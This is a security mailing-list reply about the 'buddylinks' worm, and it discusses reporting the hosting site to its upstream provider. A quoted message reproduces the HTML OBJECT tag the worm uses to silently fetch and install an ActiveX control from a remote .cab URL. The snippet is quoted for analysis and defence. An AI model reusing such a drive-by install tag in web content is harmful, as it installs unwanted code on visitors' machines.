Re: buddylinks worm

[Jason Yates <jaywhy2 () comcast net>]

Jeremy Junginger wrote:

> Yep!  It actually uses the follwing method:
>
> <OBJECT ID="ShellInstaller" WIDTH=0 HEIGHT=0
> CLASSID="CLSID:FDDCE9FF-1FC6-413c-80B1-37B101FDA1D4"
> CODEBASE="http://download.buddylinks.net/ShellInstaller.cab#Version=1,0,0,001
> ">
> </OBJECT>
>
> To install ShellINstaller.INF (Size: 2,119) and ShellInstaller.ocx (Size
> 81,920), which is an ActiveX control.  That's all I've found so far.  Let me
> know if you guys find anything else.  
>
>  

I contacted internap.com there upstream provider.  There support guy I 
talked to told me email abuse () internap com and they'll look into it.  I 
emailed the information; but I really didn't think anything would happen 
of it.  The support rep didn't seem like he really cared.  I guess I was 
wrong though.  I can't ping buddylinks.net anymore.  Although I wouldn't 
credit internap.com yet though; it just as likely they got DOS'd by the 
amount of requests and crashed.

---------------------------------------------------------------------------
Free trial: Astaro Security Linux -- firewall with Spam/Virus Protection

Protect your network with the comprehensive security solution that
integrates six applications for ease of use and lower TCO.

Firewall - Virus protection - Spam protection - URL blocking - VPN
- Wireless security.

Download 30-day evaluation at:
http://www.astaro.com/php/contact/securityfocus.php
----------------------------------------------------------------------------